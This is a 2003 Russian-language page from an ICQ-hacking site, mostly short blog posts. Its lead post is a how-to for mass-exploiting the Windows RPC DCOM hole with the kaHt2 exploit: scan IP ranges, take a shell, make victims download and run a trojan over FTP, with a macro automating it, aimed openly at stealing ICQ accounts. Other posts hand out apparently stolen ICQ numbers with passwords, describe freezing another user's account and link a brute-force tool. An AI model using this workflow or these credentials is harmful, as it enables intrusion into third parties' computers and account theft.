RPC Dcom - How To

Вторник, 19 августа 2003 г.
Просмотров: 588
Подписаться на комментарии по RSS

В последнее время я стал наблюдать исчерпание способов угнать UIN. Все сводится к тому, чтобы зарегистрировать не существующий (а ранее существовавший) e-mail и выслать на него пароль.
Я решил немного исправить положение и написать эту статью.

Речь пойдет о нашумевшей дыре в протоколе RPC Dcom на Windows системах. Информация о дыре была опубликована 16 Июля, 2003 года командой "Last Stage of Delirium". Уязвимость существует во всех стандартных инсталляциях Windows NT 4.0, Windows 2000, Windows XP, а также в так широко разрекламированном Windows 2003.

Был выпущен многопоточный, многоцелевой эксплоит, эксплуатирующий уязвимость в RPC Dcom. Эксплоит работает против большинства версий Microsoft Windows 2000/XP систем. Поддерживает различные макросы. Этот эксплоит мы и будем использовать для наших корыстных целей.

Скачиваем kaHt2, разархивируем архив в корень диска "С:\", после чего открываем "Srart -> Run" и вбиваем следующею команду "C\:kaHt2.exe 195.96.185.1 195.96.185.255 300 " и жмем "Ok". "195.96.185.1 195.96.185.255" это диапазон IP, которые будут сканироваться. "300" это количество потоков сканирования.
В случаи нахождения уязвимой машины, вы увидите примерно эту строчку "C:\WINDOWS\system32>".
Дальше нам надо закачать троян и с помощью него скачать .dat файл или любую вас интересующую информацию.
Качаем RPC Exploit GUI v2, разархивируем и запускаем "RPC GUI v2 - r3L4x.exe", после чего идем в раздел "FTP Server" и запускаем свой FTP сервер нажатием на кнопку "Start".
Выбор трояна для использования оставляю на ваш выбор, этого добра в инете полным полно.
Допустим что вы выбрали троян и создали сервер для закачки, назвав его trojan_server.exe. Далее кладем trojan_server.exe в корень диска "C:\".
Возвращаемся к нашему эксплоиту и выполняем следующие команды:

1) Пишем "ftp", если все правильно, то вас перекинет на следующую строчку.
2) Пишем "open xxx.xx.xxx.xxx" вместо крестов - ваш IP.
3) Если предыдущий пункт выполнен правильно, вас спросят имя пользователя, тут пишем "asdf".
4) Пишем "get /trojan_server.exe" чтобы атакуемый компьютер скачал ваш троян.
5) Пишем "!trojan_server.exe" чтобы атакуемый компьютер запустил ваш троян smile.
6) Пишем "exit" чтобы выйти с шела уязвимой машины и начать поиски следующей жертвы.

Я упростил эти действия, написав маленький макрос. Макрос должен лежать в одной директории с kaHt2.exe и называться macros.txt. Открываете macros.txt, стираете все содержимое файла и вбиваете следующий текст:

"[Macro]
name=upload_trojan
key=!1
delay=900
cmd=ftp
cmd=open xxx.xx.xxx.xxx
cmd=asdf
cmd=get \trojan_server.exe
cmd=!trojan_server.exe>>a
cmd=bye
"

После чего вам остается лишь набрать "!1" в шеле и все эти команды будут выполнены автоматом, ну а дальше пишите "exit" чтобы выйти с шела и начать искать нового "друга" smile.

Вроде бы все разложил по полочкам, так что вопросов, думаю, появится не должно.

Убедительная просьба если будете где выкладывать эту статью, ставить копирайт на автора (ven000m) и на этот сайт (Asechka.ru).

Всем спасибо, все свободны.

Обсуждение в форуме.


Использованные файлы:
kaHt2 – скачать.
RPC Exploit GUI v2 – скачать.

Использованный материал:
VOID.RU
securitylab.ru

Статья написано только для ознакомления. Автор не несет не какой ответственности за действия описанные в этой статье.

Скучно...

Воскресенье, 17 августа 2003 г.
Просмотров: 408
Подписаться на комментарии по RSS

Задача для особо одаренных! Нужно всего заменить "xx" на одинаковые символы...

~~~~~~~~~~~
uin: 296xx5
password: [nin]
~~~~~~~~~~~
uin: 4x1x03
password: [nin]
~~~~~~~~~~~
uin: 648159
password: [xix] wink)
~~~~~~~~~~~

Микрософт использует Линух?

Суббота, 16 августа 2003 г.
Просмотров: 613
Подписаться на комментарии по RSS

Довольно интересные результаты выдает фингерпринт оси windowsupdate.microsoft.com с помощью nmap'a.


Device type: general purpose
Running: Linux 2.1.X|2.2.X
OS details: Linux 2.1.19 - 2.2.20
Uptime 17.601 days (since Wed Jul 30 01:20:10 2003)


Интересно это фэйк или микрософт поняла прелесть открытого софта? =))))))

Этот и другой фингерпринт оси можно узнать на канале #icqhackers с помощью команды !os <ip>
К нам можно попасть
1) Через веб
2) Через асю, послав $start на уин 10399
3) Скачав скрипт монстра
4) Через ваш ирк клиент, сервер irc.icqinfo.ru канал #icqhackers

Немного халявы.

Пятница, 15 августа 2003 г.
Просмотров: 483
Подписаться на комментарии по RSS

Убедительная просьба. Если у вас уже есть шестизнак, не берите! Ну... в крайнем случае, возьмите, чтобы подарить (но ни в коем случае не продать!). Если увижу, что эти номера продаются, берегитесь =)
3517x0
374y57
65z741
9a2641
на всех номерах пароль: 1os7s0u1
халява от s0u1 s33k3r, так что лично я никакой ответственности за нее не несу.

Новый способ заморозки уинов.

Среда, 13 августа 2003 г.
Просмотров: 500
Подписаться на комментарии по RSS

Пердыстория: прошла информация, что человек с уина 209000000 кидает добропорядочных продавцов ась (тафтология неможно, но ничего). Мимо меня этот кидала тоже не прошел. Решил обменять два моих xyzxyz на 100903. Ну я предупрежденный и наглый взял и кинул его на 100903 wink.
Самое оно: после нехитрых комбинаций номер перестал логиниться, а если ввести неправильный пароль, то выдаст Wrong pass. Номер заморожен. Разморозкой служит icq password reset, но примак у него есть, но как я понял от 2001 года, а я выслал пароль на мыло из базы 99го, значит он отдыхает. Как только до конца разберусь в обнаруженном баге, выложу полное описание.
Bonus pack:
icq: 100903
pass: 243 10 21 18 13 166 243 13
Дерзайте!

RdM-[YanDeX]
icq105300
rdm-yandex@nnm.ru

RusIcq.net owned, или давайте жить по-честному.

Среда, 13 августа 2003 г.
Просмотров: 492
Подписаться на комментарии по RSS

Многоуважаемые продавцы уинов, имеющие свои сайты! Уважайте человеческий труд! Перестаньте покупать домены по ворованным кредитным картам, ведь платить честным образом $30 в год не так уж и проблематично!
RusIcq.net, например, больше никогда не будет продавать номера wink Подробности на главной странице, всем читать. Обсуждения на форуме. http://www.asechka.ru/forum/showthread.php?s=&threadid=3809

ICQ <=> IRC Gate

Понедельник, 11 августа 2003 г.
Просмотров: 636
Подписаться на комментарии по RSS

На нашем любимом =) канале реализован гейт ICQ <=> IRC. Теперь можно учавствовать в беседах канала даже не имея ИРК клиента.

Для того, чтобы воспользоваться гейтом пошлите на уин 10399 команду: $start
После этого вы будете получать все что пишется на канале, а ваши сообщения будут проговариваться ботом.
Чтобы выйти, пошлите $stop.

На нашем канале есть проверка уинов на инвизибл, выдача операционной системы сайта, переводчик, погода, проверка имэйл уинов по базе 99 года, розыгрыш пятизначек, ежедневная раздача шести и семизначек и много много другого =)

Также на канал можно зайти более традиционным образом:
1) Через веб-гейт: здесь
2) Скачав скрипт монстра: здесь
3) Через ваш ИРК клиент: сервер - irc.icqinfo.ru, канал - #icqhackers

Бесплатные UIN's от сайта NSD.ru

Воскресенье, 10 августа 2003 г.
Просмотров: 667
Подписаться на комментарии по RSS

Uin's пердоставлены сайтом NSD.ru - "НеСанкционированный Доступ".

Семь (7) Семизначек (7) с Семизначными (7) паролями =)
Хватайте быстрей, пока за Вас ето не сделал кто-нибудь еще!

4155689;nsd.ru#1
4229925;nsd.ru#2
4232055;nsd.ru#3
4233327;nsd.ru#4
4233905;nsd.ru#5
4246872;nsd.ru#6
4252075;nsd.ru#7

IPDbrute2/udc2 Pro

Пятница, 8 августа 2003 г.
Просмотров: 333
Подписаться на комментарии по RSS

http://www.ifud.ru/ipd/IPDbrute2udc2Pro.rar

Жутко кривая, совершенно нерабочая, один сплошной глюк/баг.
Просьба юзать с большой осторожностью, т.к. может проглотить некоторые уины, не выплюнув их, может сменить пасс и забыть его, никуда не записав, может просто упасть и так далее.

Судя по всему, в details.xml можно в тех полях, где предполагается стринг, а не численное значение, использовать макросы типа %RAND_NUM_1%, %RAND_NUM_2%, %RAND_GUID%, %RAND_TEXT1%, %RAND_TEXT2%, %RAND_TEXT3%, %RAND_TEXT4%...
например:
<main>
<nick>%RAND_NUM_1%</nick>
<first_name>%RAND_TEXT2%</first_name>
<last_name>%RAND_TEXT1%</last_name>
<pri_email>%RAND_TEXT3%@mail.com</pri_email>
если это работает, то по идее и еще более крутые макросы тоже работают =) но об них позже.

короче никаких притензий. если чё-то не так работает - пишите, исправлю может =)

(с) 2003 МЛУ\ша

Скажите «Прощай!» слову «Здравствуй!»

Пятница, 8 августа 2003 г.
Просмотров: 360
Подписаться на комментарии по RSS

А виной всему современные технологии, бешеный ритм общения, чаты, ICQ и SMS-сообщения.

Новые правила общения, возникшие благодаря электронной почте и системам мгновенного обмена сообщениями, вскоре сделают слова "здравствуй" и "до свидания" ископаемой редкостью. Для следующего поколения они будут такими же анахронизмами как слова «камзол» или «папильотки». «Привет», «эй» и «пока» – вот какие слова придут им на замену, сообщает Ananova.

И вообще, весь мир будет стремиться переходить на английские “yo”, “hey”, “buy” и "laters". Этому в значительной степени способствуют процессы активного интернационального общения, ставшие возможными благодаря распространению Интернета по планете.

Джонатан Грин, филолог и автор словаря современного сленга, исследовавший эту тему, говорит, что сегодня мы сталкиваемся с ситуацией, когда люди чаще пользуются электронной почтой, чем отживающими свое письмами в бумажных конвертах, а новые технологии вынуждают нас говорить быстрее и автоматически поощряют использование сленга.

"Я не удивлюсь, если в течение ближайших 50 лет слова «здравствуйте» и «до свидания» вообще выйдут из употребления в электронной переписке", - говорит Грин.

Исследование, в котором приняли участие более 2000 добровольцев, проводилось на базе программы обмена короткими сообщениями MSN messager с целью выявления закономерностей новояза. Оказалось, что главная альтернатива приветствию “hello” сегодня "hey", cразу за этим словом по частоте использования идут словечки "g'day", "hola", "howdy" и "yo". Наиболее используемые альтернативы слову “goodbuy” - "laters", "ciao", "au revoir", "hasta la vista" и "in a while".

В процессе исследования выяснилось, что люди сегодня обращаются друг к другу при помощи следующих слов (по нисходящей): "mate", "love", "sweetheart", "buddy" и "pal".

Разумеется, Россия и в этом вопросе идет своим путем, но и у нас редко можно увидеть в аське приветствие типа «Добрый день!», а вместо него даже незнакомому человеку все чаще говорят «привет», «hi», «эй» или «здорово».

Пользуясь случаем автор этой заметки хочет поделиться с читателем мужского пола собственным наблюдением. Если вы хотите «закадрить» девушку по ICQ или электронной почте, попробуйте пересилить себя и писать ей “по-старинке”. Не стесняйтесь использовать развернутые предложения, цитаты и лирические отступления. Используйте все, чему вас учили на уроках языка и литературы (если вы туда ходили). И, если девушка не полная ПТУ-шнца, то если не успех, то, как минимум, заинтересованность вашей персоной возникнет почти наверняка.

Вот и все. Сiao!


Автор: Алексей Ковалев